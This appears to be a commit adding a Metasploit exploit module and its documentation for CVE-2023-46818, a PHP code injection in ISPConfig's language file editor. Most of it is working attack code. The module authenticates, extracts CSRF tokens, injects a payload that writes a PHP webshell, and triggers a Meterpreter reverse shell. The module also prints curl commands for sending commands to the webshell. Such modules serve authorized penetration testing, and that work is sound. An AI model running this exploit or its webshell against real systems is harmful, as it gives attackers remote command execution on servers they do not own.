Add exploit module for ISPConfig language_edit.php PHP Code Injection (CVE-2023-46818)

- Adds modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
- Adds documentation for the module in documentation/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection.md
- Module targets ISPConfig < 3.2.11p1 with admin_allow_langedit enabled
- References and implementation based on PoC and advisories at https://github.com/SyFi/CVE-2023-46818

Author: happybear-21

documentation/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection.md

@@ -0,0 +1,78 @@
+## Vulnerable Application
+
+ISPConfig before 3.2.11p1 is vulnerable to PHP code injection via the language file editor (language_edit.php) if the `admin_allow_langedit` option is enabled. An authenticated administrator can inject arbitrary PHP code, leading to remote code execution on the server.
+
+- Vendor Advisory: https://www.ispconfig.org/
+- CVE: [CVE-2023-46818](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
+- PoC/Details: [https://github.com/SyFi/CVE-2023-46818](https://github.com/SyFi/CVE-2023-46818)
+- Exploit writeup: [https://karmainsecurity.com/KIS-2023-13](https://karmainsecurity.com/KIS-2023-13)
+
+### Setup Example
+
+1. Download and install ISPConfig (vulnerable version, e.g., 3.2.11 or earlier)
+2. Enable `admin_allow_langedit` in the ISPConfig configuration.
+3. Create an admin user for testing.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/linux/http/ispconfig_lang_edit_php_code_injection`
+3. Set the `RHOSTS`, `USERNAME`, and `PASSWORD` options
+4. Set `TARGETURI` if ISPConfig is not at the web root
+5. Run the module
+6. You should get a Meterpreter or command shell session as the web server user.
+
+## Options
+
+### USERNAME
+The ISPConfig administrator username to authenticate with.
+
+### PASSWORD
+The ISPConfig administrator password to authenticate with.
+
+### TARGETURI
+The base path to ISPConfig (default: `/`).
+
+### LOGIN_TIMEOUT
+Timeout for login request (default: 15 seconds).
+
+### DELETE_SHELL
+Whether to delete the webshell after exploitation (default: true).
+
+## Scenarios
+
+### ISPConfig 3.2.11 (or earlier), Ubuntu 20.04
+
+```
+msf6 > use exploit/linux/http/ispconfig_lang_edit_php_code_injection
+msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set rhosts 192.168.1.100
+rhosts => 192.168.1.100
+msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set username admin
+username => admin
+msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set password adminpass
+password => adminpass
+msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > run
+
+[*] Started reverse TCP handler on 192.168.1.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] ISPConfig installation detected
+[*] Attempting login with username 'admin' and password 'adminpass'
+[+] Login successful!
+[*] Injecting PHP shell...
+[+] CSRF tokens extracted: ID=abc123..., KEY=def456...
+[+] Shell successfully injected: sh_xxxxx.php
+[*] Starting payload handler...
+[+] PHP payload triggered
+[*] Waiting for session...
+[+] Shell responsive: uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+uname -a
+Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+## Notes
+- The module requires valid ISPConfig admin credentials and the `admin_allow_langedit` option enabled.
+- The shell is removed after exploitation if `DELETE_SHELL` is true.
+- The exploit drops a PHP webshell and triggers the payload for Meterpreter or command shell access. 

modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb

@@ -0,0 +1,237 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ISPConfig language_edit.php PHP Code Injection',
+        'Description' => %q{
+          An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'syfi' # Discovery and PoC
+        ],
+        'References' => [
+          ['CVE', '2023-46818'],
+          ['URL', 'https://github.com/SyFi/CVE-2023-46818'],
+          ['URL', 'https://karmainsecurity.com/KIS-2023-13'],
+          ['URL', 'https://karmainsecurity.com/pocs/CVE-2023-46818.php']
+        ],
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          [
+            'Automatic PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2023-10-24',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The URI path to ISPConfig', '/']),
+      OptString.new('USERNAME', [true, 'ISPConfig administrator username']),
+      OptString.new('PASSWORD', [true, 'ISPConfig administrator password'])
+    ])
+
+    register_advanced_options([
+      OptInt.new('LOGIN_TIMEOUT', [true, 'Timeout for login request', 15]),
+      OptBool.new('DELETE_SHELL', [true, 'Delete webshell after session', true])
+    ])
+  end
+
+  def check
+    print_status('Checking if target is ISPConfig...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login', '')
+    })
+    return CheckCode::Unknown unless res
+    if res.body.include?('ISPConfig') || res.body.include?('ispconfig')
+      print_good('ISPConfig installation detected')
+      return CheckCode::Detected
+    end
+    CheckCode::Safe
+  end
+
+  def authenticate
+    print_status("Attempting login with username '#{datastore['USERNAME']}' and password '#{datastore['PASSWORD']}'")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login', ''),
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        's_mod' => 'login'
+      },
+      'keep_cookies' => true
+    }, datastore['LOGIN_TIMEOUT'])
+    fail_with(Failure::NoAccess, 'Login request failed') unless res
+    if res.body.match(/Username or Password wrong/i)
+      fail_with(Failure::NoAccess, 'Login failed: Invalid credentials')
+    end
+    if res.headers['Location'] && res.headers['Location'].include?('admin') ||
+       res.body.downcase.include?('dashboard')
+      print_good('Login successful!')
+      return true
+    end
+    print_warning('Login status unclear, attempting to continue...')
+    true
+  end
+
+  def generate_random_string(length = 10)
+    charset = ('a'..'z').to_a
+    Array.new(length) { charset.sample }.join
+  end
+
+  def generate_shell_code
+    print_status('Generating PHP payload...')
+    php_payload = payload.encoded
+    php_shell = %Q{<?php\nprint('____SHELL_START____');\nif(isset($_SERVER['HTTP_CMD'])) {\n  $cmd = base64_decode($_SERVER['HTTP_CMD']);\n  if($cmd == 'PAYLOAD_TRIGGER') {\n    #{php_payload}\n  } elseif($cmd) {\n    passthru($cmd);\n  }\n} else {\n  #{php_payload}\n}\nprint('____SHELL_END____');\n?>}
+    Rex::Text.encode_base64(php_shell)
+  end
+
+  def inject_shell
+    print_status('Injecting PHP shell...')
+    @shell_file = "sh_#{generate_random_string}.php"
+    php_code = generate_shell_code
+    injection = "'];file_put_contents('#{@shell_file}',base64_decode('#{php_code}'));die;#"
+    lang_file = generate_random_string + ".lng"
+    edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
+    initial_data = {
+      'lang' => 'en',
+      'module' => 'help',
+      'lang_file' => lang_file
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => edit_url,
+      'vars_post' => initial_data,
+      'keep_cookies' => true
+    }, 10)
+    fail_with(Failure::UnexpectedReply, 'Unable to access language_edit.php') unless res
+    csrf_id_match = res.body.match(/_csrf_id" value="([^"]+)"/)
+    csrf_key_match = res.body.match(/_csrf_key" value="([^"]+)"/)
+    unless csrf_id_match && csrf_key_match
+      fail_with(Failure::UnexpectedReply, 'CSRF tokens not found!')
+    end
+    csrf_id = csrf_id_match[1]
+    csrf_key = csrf_key_match[1]
+    print_good("CSRF tokens extracted: ID=#{csrf_id[0..10]}..., KEY=#{csrf_key[0..10]}...")
+    injection_data = {
+      'lang' => 'en',
+      'module' => 'help',
+      'lang_file' => lang_file,
+      '_csrf_id' => csrf_id,
+      '_csrf_key' => csrf_key,
+      'records[\\]' => injection
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => edit_url,
+      'vars_post' => injection_data,
+      'keep_cookies' => true
+    }, 10)
+    fail_with(Failure::UnexpectedReply, 'Injection request failed') unless res
+    shell_url = normalize_uri(target_uri.path, 'admin', @shell_file)
+    print_status('Verifying shell injection...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => shell_url,
+      'keep_cookies' => true
+    }, 5)
+    if res && res.body.include?('SHELL_START') && res.body.include?('SHELL_END')
+      print_good("Shell successfully injected: #{@shell_file}")
+      register_file_for_cleanup(@shell_file) if datastore['DELETE_SHELL']
+      return shell_url
+    else
+      fail_with(Failure::UnexpectedReply, 'Shell injection failed or shell not accessible')
+    end
+  end
+
+  def execute_command(command, shell_uri = nil)
+    return nil unless @shell_file
+    shell_url = shell_uri || normalize_uri(target_uri.path, 'admin', @shell_file)
+    encoded_cmd = Rex::Text.encode_base64(command)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => shell_url,
+      'headers' => {
+        'CMD' => encoded_cmd
+      },
+      'keep_cookies' => true
+    }, 15)
+    return nil unless res
+    output_match = res.body.match(/____SHELL_START____(.*?)____SHELL_END____/m)
+    return output_match[1] if output_match
+    nil
+  end
+
+  def trigger_payload(shell_uri)
+    print_status('Triggering PHP payload...')
+    framework.threads.spawn('PayloadTrigger', false) do
+      send_request_cgi({
+        'method' => 'GET',
+        'uri' => shell_uri,
+        'keep_cookies' => true
+      }, 10)
+    end
+    framework.threads.spawn('PayloadTriggerManual', false) do
+      select(nil, nil, nil, 2)
+      execute_command('PAYLOAD_TRIGGER', shell_uri)
+    end
+    print_good('PHP payload triggered')
+  end
+
+  def exploit
+    authenticate
+    shell_uri = inject_shell
+    print_status('Starting payload handler...')
+    trigger_payload(shell_uri)
+    print_status('Waiting for session...')
+    select(nil, nil, nil, 5)
+    if framework.sessions.length == 0
+      print_warning('No session established automatically')
+      print_status('Testing shell functionality...')
+      output = execute_command('id', shell_uri)
+      if output
+        print_good("Shell responsive: #{output.strip}")
+        print_line("\n" + '=' * 60)
+        print_status('Shell Access Information:')
+        print_line("URL: #{full_uri}#{shell_uri}")
+        print_line("Usage: Send base64 encoded commands via 'CMD' HTTP header")
+        print_line("Manual trigger: curl '#{full_uri}#{shell_uri}'")
+        print_line("Command example: curl -H 'CMD: #{Rex::Text.encode_base64('id')}' '#{full_uri}#{shell_uri}'")
+        print_line('=' * 60)
+      else
+        print_error('Shell test failed')
+        print_line("Manual test: curl '#{full_uri}#{shell_uri}'")
+      end
+    end
+  end
+end